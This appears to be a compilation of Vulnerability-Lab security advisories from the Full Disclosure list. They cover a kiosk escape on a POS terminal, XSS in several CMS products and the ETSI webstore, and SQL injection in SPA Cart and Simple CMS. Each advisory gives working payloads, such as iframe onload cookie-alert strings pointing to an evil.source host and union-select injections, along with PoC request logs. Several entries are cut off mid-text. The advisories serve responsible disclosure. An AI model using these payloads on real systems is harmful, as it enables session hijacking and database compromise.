Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>""}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 
Firefox/102.0
Accept: 
text/html,application/xhtml+

[FD] Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2323


Release Date:
=
2023-07-17


Vulnerability Laboratory ID (VL-ID):

2323


Common Vulnerability Scoring System:

7.2


Vulnerability Class:

Privilege Escalation


Current Estimated Price:

3.000€ - 4.000€


Product & Service Introduction:
===
KOMET is an interactive, multifunctional kiosk and specially designed for the 
fast food industry. Available as a wall-mounted or
freestanding model, its design is especially adapted to foodservice such as 
take-aways or fast food in system catering. The kiosk
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt 
printer, a payment terminal and a 2D barcode scanner.
With a click, the customer selects, books, orders, purchases and pays directly 
at the kiosk. The system offers the possibility to
manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage:https://aures.com/de/komet/  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a local kiosk 
privilege escalation vulnerability in the operating system of
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the 
german company immergrün franchise gmbh.


Affected Product(s):

Aures Technologies GmbH
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT 
Enterprise)


Vulnerability Disclosure Timeline:
==
2023-05-09: Researcher Notification & Coordination (Security Researcher)
2023-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Local


Severity Level:
===
High


Authentication Type:

Open Authentication (Anonymous Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A kiosk mode escalation vulnerability has been discovered in the operating system 
of the Aures Komet Booking & POS Terminal
(Windows 10 IoT Enterprise) used by the german company immergrün franchise 
gmbh. The security vulnerability allows local attackers
to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode in the aures 
komet booking & pos terminal. Local attackers are
able to use the touch functionalities in the aures komet booking & pos terminal 
system to escalate with higher privileges. The security
vulnerability is located in the context menu function of the extended menu on 
touch interaction. Attackers with restricted low local
privileged access to the booking service front display are able to execute 
files, can unrestricted download contents or exfiltrate
local file-system information of the compromised windows based operating system.

No keyboard or connections are required to manipulate the service booking and 
payment terminal. The booking and payment terminal system
vulnerability requires no user user interaction to become exploited and can 
only be triggered by local physical device access.

Vulnerable Operating System(s):
[+] Windows 10 (IoT Enterprise)

Affected Component(s):
[+] Context Menu

Affected Function(s):
[+] Web Search
[+] Share (Teilen)


Proof of Concept (PoC):
===
The local vulnerability can be exploited by local attackers with physical 
device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


PoC: Sheet
Touch Display => Select Food Item => Highlight Text
=> Open Context Menu => Extend Context Menu => Web-Search
=> Browser => Local File System => Compromised!


Manual steps to reproduce the vulnerability ...
01.  First touch the monitor display to move on from standby
02.  Select an food item from the menu of immergrün (we recomment the cesar 
wraps)
03.  Push the information button of the selected food item
04.  Push twice via touch to mark the selected food item text
05.  Press a third time after you have marked the context by holding it down on 
the touch display
06.  Now the function context menu of the operating system for highlighted text 
appears
07.  On the context menu appearing 3 dots to extend the visible function menu
08.  Select the web-search or share function for the highlighted content in the 
context menu
09.  The browser of the operating system opens on the main front screen
10.1 By now you are able to download an execute executab

[FD] PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2285


Release Date:
=
2023-07-19


Vulnerability Laboratory ID (VL-ID):

2285


Common Vulnerability Scoring System:

5.8


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
PaulPrinting is designed feature rich, easy to use, search engine friendly, 
modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple persistent 
cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.


Affected Product(s):

CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple persistent input validation vulnerabilities has been discovered in the 
official PaulPrinting (v2018) cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser
to web-application requests from the application-side.

The first vulnerability is located in the register module. Remote attackers are 
able to register user account with malicious script code.
After the registration to attacker provokes an execution of the malformed 
scripts on review of the settings or by user reviews of admins
in the backend (listing).

The second vulnerability is located in the delivery module. Remote attackers 
with low privileged user accounts are able to inject own
malicious script code to contact details. Thus allows to perform an execute on 
each interaction with users or by reviews of admins in
the backend (listing).

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery

Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state

Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review


Proof of Concept (PoC):
===
The persistent input validation web vulnerabilities can be exploited by remote 
attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open your browser and start a http session tamper
2. Register in the application by login click to register
3. Inject to the marked vulnerable input fields your test payload
4. Save the entry by submit via post method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrong validated context that 
executes on preview of users
6. The script code executes on preview of the profile - settings
7. Successful reproduce of the first vulnerability!
8. Followup by opening the Delivery address module
9. Add a contact and add in the same vulnerable marked input fields your test 
payload
Note: T he script code executes on each review of the address in the backend or 
user frontend
10. Successful reproduce of the second vulnerability!


Exploitation: Payload
"
"


--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: applica

[FD] ETSI WEBstore 2023 - Persistent Cross Site Scripting Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
ETSI WEBstore 2023 - Persistent Cross Site Scripting Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2327


Release Date:
=
2023-07-26


Vulnerability Laboratory ID (VL-ID):

2327


Common Vulnerability Scoring System:

4.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

1.000€ - 2.000€


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent web 
vulnerability in the ETSI WebStore web-application.


Affected Product(s):

European Telecommunications Standards Institute (ETSI)
Product: WEBstore 2023 - User Management (Web-Application)


Vulnerability Disclosure Timeline:
==
2023-07-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (User Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the 
official ETSI Webstore 2023 web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise
browser to web-application requests from the application-side.

The vulnerability is located in the all input fields of the 
NewOrModifyCustomer.asp registration / modify formular.
Remote attackers are able to inject own malicious script code with persistent 
attack vector by an inject in the
wrong sanitized input fields. The injection point is the registration or modify 
formular of the webstore.
The execution points are located in the index, listarticle, myprofiles and user 
backend listing of the webstore
web-appliation service.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected 
application modules.

Request Methode:
[+] POST

Vulnerable Inputs:
[+] first name
[+] last name
[+] company name
[+] address

Affected Modules:
[+] MyProfile
[+] ListArticle
[+] ShowCustomer


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an account for the etsi webstore using the registration formular
2. Inject script code payloads to the firstname, lastname, companyname and 
address input fields
3. Save the account by submit via post method request
4. Confirm the email and logon to the account
Note: After the login the execution takes place in the header were the user 
data is show as well as in separated websites were adress data is displayed. On 
preview of the customer in the backend an execution of the malicious payload 
takes as well place.
5. Successful reproduce of the persistent web vulnerability!


--- PoC Session Logs (POST) [Inject & Execute] ---
https://webstore.etsi.org/ecommerce/ShowHideCustomer.asp
Host: webstore.etsi.org
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 906
Origin:https://webstore.etsi.org
Connection: keep-alive
Referer:https://webstore.etsi.org/ecommerce/NewOrModifyCustomer.asp
Cookie: list=2; _ga_L34WJL1P2Z=GS1.1.1690359581.2.1.1690359631.0.0.0; 
_ga=GA1.1.1806199158.1690355803; ASPSESSIONIDSWABCBBQ=IHBHHHFAJLDMIDCJINGNGIIK
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
NewOrExisting=NEW&eMail=tamm...@protonmail.com&password=cryptoag2&Company=A">https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')>&ClientCode=&ClientCodeCSA3=,&Fname=B">https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')>&member_orga_id=16173&Lname=C">https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')>&Address1=D">https://shorturl.&PostalCode=51221&Address2=E";>https://shorturl.&City=Bremen";>https://shorturl.at/uFGNV  onload=alert('TEA1-2-3-4')>&Address3=F">https://shorturl.&Country=ALALBANIA&Phone=234534654364&Fax=&VATID=&FORM_DISCLAIMER=on&FORM_CAPTCHA=S430Q2&Submit=Submit
-
POST: HTTP/2.0 

[FD] Simplephpscripts Simple CMS v2.1 - XSS Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Simplephpscripts Simple CMS v2.1 - XSS Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2301


Release Date:
=
2021-10-18


Vulnerability Laboratory ID (VL-ID):

2301


Common Vulnerability Scoring System:

5.1


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
The system could be used only in already existing websites to control their 
page sections and contents.
Just paste a single line of code on your web page section and start controlling 
it through the admin area.
Very simple installation - one step installation wizard. Option to include 
contents into web page sections
through php include, javascript or iframe embed. Any language support. 
WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with 
Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a non-persistent 
cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 
web-application.


Affected Product(s):

Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-10-01: Vendor Response/Feedback (Security Department)
2021-10-02: Vendor Fix/Patch (Service Developer Team)
2021-10-10: Security Acknowledgements (Security Department)
2021-11-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A non-persistent cross site scripting vulnerability has been discovered in the 
official Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with non-persistent attack vector to compromise browser to
web-application requests by the client-side.

The cross site scripting vulnerability is located in the `id` parameter of the 
preview.php file. The request method to inject the malicious
script code is GET and the attack vector of the vulnerability is 
non-persistent. The execution of the script code occurs in the undefined
exception-handling output message.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application 
modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Preview (Pages)

Vulnerable File(s):
[+] preview.php

Vulnerable Parameter(s):
[+] id

Affected Module(s):
[+] Undefined Exception-Handling (Preview)


Proof of Concept (PoC):
===
The non-persistent web vulnerability can be exploited by remote attackers 
without user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


PoC: Payload
-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E


PoC: Exploitation
https://simple-cms.localhost:8000/simplecms/preview.php?id=-1%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E


Vulnerable Source: preview.php (Exception-Handling)



Simple CMS page -1>"


https://simple-cms.localhost:8000/simplecms/lightbox/js/jquery-1.11.0.min.js";>
https://simple-cms.localhost:8000/simplecms/lightbox/js/lightbox.min.js";>
https://simple-cms.localhost:8000/simplecms/lightbox/css/lightbox.css"; 
rel="stylesheet" />
No page content with id -1>"





--- PoC Session Logs (GET) ---
https://simple-cms.localhost:8000/simplecms/preview.php?id=-1>"
Host: simple-cms.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=2emae9mm1m1misttrp1a3e1p21
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 1658
content-type: text/html; charset=UTF-8
-
https://simple-cms.loc

[FD] SPA Cart CMS - Multiple SQL Injection Web Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
SPA Cart CMS - Multiple SQL Injection Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2304


Release Date:
=
2021-10-18


Vulnerability Laboratory ID (VL-ID):

2304


Common Vulnerability Scoring System:

7.3


Vulnerability Class:

Script Code Injection


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
SPA-Cart - Single Page Application. Fully featured eCommerce CMS platform. Very 
fast ajaxfied pages.

(Copy of the Homepage: https://spa-cart.com/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote 
sql-injection web vulnerability in the SPA Cart CMS (v2021) web-application.


Affected Product(s):

olegkhorev
Product: SPA Cart CMS (v2021) - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-10-01: Vendor Response/Feedback (Security Department)
2021-10-02: Vendor Fix/Patch (Service Developer Team)
2021-10-10: Security Acknowledgements (Security Department)
2021-11-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Full Authentication (Admin/Root Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A remote sql-injection vulnerability has been discovered in the official 
creative zone web-application.
The vulnerability allows remote attackers to inject or execute own sql commands 
to compromise the dbms
or file system of the application.

The remote sql injection web vulnerabilities are located in the `id`, 
`shippingid` and `zoneid` parameters of the
`category`, `products` and `shipping_charges` modules. Remote attackers with 
privileged panel access are able to
inject and execute own malicious sql commands to compromise the integrated 
database management system (mysql).
The request method to inject and execute is GET and the attack vector is 
located on the client-side.

Exploitation of the sql injection vulnerability requires no user interaction 
and a privileged application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] category
[+] products
[+] shipping_charges

Vulnerable Parameter(s):
[+] id
[+] shippingid
[+] zoneid


Proof of Concept (PoC):
===
The remote sql-injection web vulnerability can be exploited by remote attackers 
with privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability 
follow the provided information and steps below to continue.


PoC: Exploitation
http://spa-cart.localhost:8080/admin/category/[ID][SQL-INJECTION!]--
http://spa-cart.localhost:8080/admin/products?sort=[ID][SQL-INJECTION!]--&direction=0
http://spa-cart.localhost:8080/admin/shipping_charges?type=escape&shippingid=[ID][SQL-INJECTION!]--
http://spa-cart.localhost:8080/admin/shipping_charges?type=escape&shippingid=&zoneid=[ID][SQL-INJECTION!]--


PoC: Exploit



http://spa-cart.localhost:8080/admin/category/-1' union select all 
1,2,3,4,5,6,7,8,@@verison--">
http://spa-cart.localhost:8080/admin/products?sort=-1' union select all 
1,2,3,4,5,6,7,8,@@verison--">
http://spa-cart.localhost:8080/admin/shipping_charges?type=escape&shippingid=-1' 
union select all 1,2,3,4,5,6,7,8,@@verison--">
http://spa-cart.localhost:8080/admin/shipping_charges?type=escape&shippingid=&zoneid=-1' 
union select all 1,2,3,4,5,6,7,8,@@verison--">




--- SQL Exception Logs ---
Error: MySQL
Statement: SELECT all FROM products p GROUP BY p.productid ORDER BY p.status 
DESC, p.1 LIMIT 0, 50;
Exception: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near 1 
LIMIT 0, 50' at line 1
-
Statement: SELECT all FROM products p GROUP BY p.productid ORDER BY p.status 
DESC, p.1 LIMIT 0, 50;
Exception: You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near 1 
LIMIT 0, 50' at line 2
-
Statement: SELECT all FROM products p GROUP BY p.productid ORDER BY p.status 
DESC, p.1 LIMIT 0, 50;
Exception: You have an error in your SQL syntax; check the manual that 
correspo

[FD] Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2302


Release Date:
=
2021-10-19


Vulnerability Laboratory ID (VL-ID):

2302


Common Vulnerability Scoring System:

5.3


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
The system could be used only in already existing websites to control their 
page sections and contents.
Just paste a single line of code on your web page section and start controlling 
it through the admin area.
Very simple installation - one step installation wizard. Option to include 
contents into web page sections
through php include, javascript or iframe embed. Any language support. 
WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with 
Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 
web-application.


Affected Product(s):

Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Full Authentication (Admin/Root Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the 
Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise
browser to web-application requests from the application-side.

The persistent cross site web vulnerability is located in `name`, `username`, 
`password` parameters of the `newUser`
or `editUser` modules. Remote attackers with privileged application user 
account and panel access are able to inject
own malicious script code as credentials. The injected code executes on preview 
of the users list. The request method
to inject is post and the attack vector is persistent.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected 
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] newUser
[+] editUser

Vulnerable File(s):
[+] admin.php?act=users

Vulnerable Input(s):
[+] Name
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] name
[+] username
[+] password

Affected Module(s):
[+] Users (act=users) (Backend)


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with privileged account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


PoC: Payload
">


Vulnerable Source: admin.php?act=users

Name
Email
Username
Password
 


c">
keymaste...@protonmail.com
d">
e">





--- PoC Session Logs (POST) [Create] ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=c">&email=teste...@test.de
&username=d">
&password=e">&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 5258
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/31337
Host: simple-cms.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php
Cookie: PH

[FD] Simplephpscripts Simple CMS v2.1 - Remote SQL Injection Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Simplephpscripts Simple CMS v2.1 - Remote SQL Injection Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2303


Release Date:
=
2021-10-19


Vulnerability Laboratory ID (VL-ID):

2303


Common Vulnerability Scoring System:

7.1


Vulnerability Class:

SQL Injection


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
The system could be used only in already existing websites to control their 
page sections and contents.
Just paste a single line of code on your web page section and start controlling 
it through the admin area.
Very simple installation - one step installation wizard. Option to include 
contents into web page sections
through php include, javascript or iframe embed. Any language support. 
WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with 
Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote 
sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 
web-application.


Affected Product(s):

Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

A remote sql-injection vulnerability has been discovered in the official 
creative zone web-application.
The vulnerability allows remote attackers to inject or execute own sql commands 
to compromise the dbms
or file system of the application.

The sql-injection web vulnerability is located in the `newUser` and `editUser` 
function of the `users` module in
the `admin.php` file. Remote attackers with privileged access to the panel are 
able to add users. If a user account
already exists like for example the admin account, each add of the same name or 
email values results in a unfiltered
mysql exception. The exception is not filtered and sanitized. Thus allows 
privileged attackers to inject and execute
own sql commands on the affected database management system to compromise. The 
request method to inject is post and
the attack vector is non-persistent.

Exploitation of the sql injection vulnerability requires user interaction and a 
privileged web-application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] newUser
[+] editUser

Vulnerable File(s):
[+] admin.php?act=users

Vulnerable Input(s):
[+] Name
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] name
[+] username
[+] password

Affected Module(s):
[+] Users (act=users) (Backend)


Proof of Concept (PoC):
===
The remote sql-injection web vulnerability can be exploited by remote attackers 
with privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability 
follow the provided information and steps below to continue.


PoC: Example
act=addUser&name=[ADD EXISITING DEFAULT VALUE!]&email=t...@test.de&username=[ADD 
EXISITING DEFAULT VALUE!]&password=[ADD EXISITING DEFAULT VALUE!]&submit=Add User


PoC: Exploitation
act=addUser&name=[ADD EXISITING DEFAULT 
VALUE]-[SQL-INJECTION!]'&email=t...@test.de&username=[ADD EXISITING DEFAULT 
VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User


--- PoC Session Logs (POST) ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addU

[FD] PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities

[i...@vulnerability-lab.com]

Document Title:
===
PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2290

Bulletin: 
https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/


Release Date:
=
2021-10-20


Vulnerability Laboratory ID (VL-ID):

2290


Common Vulnerability Scoring System:

5


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Upload, import, stream or embed any media. The smart way to manage audio & 
video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, 
subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a 
Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple 
non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 
video cms web-application.


Affected Product(s):

PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

Multiple non-persistent cross site web vulnerabilities has been discovered in 
the official PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with non-persistent attack vector to compromise browser
to web-application requests by the client-side.

The cross site scripting vulnerabilities are located in the `moved`, `username` 
and `keyword` parameters of the `categories.php`, `import.php`
or `import-user.php` files. The injection point is located in the get method 
request and the execution occurs with non-persistent attack vector
in the status message or exception of the admin panel ui.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application 
modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] categories.php
[+] import-user.php
[+] import.php

Vulnerable Parameter(s):
[+] move
[+] username
[+] keyword

Affected Module(s):
[+] Status Message & Exception


Proof of Concept (PoC):
===
The client-side cross site scripting web vulnerabilities can be exploited by 
remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


PoC: Payload
%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E


PoC: Exploitation
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
-
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
-
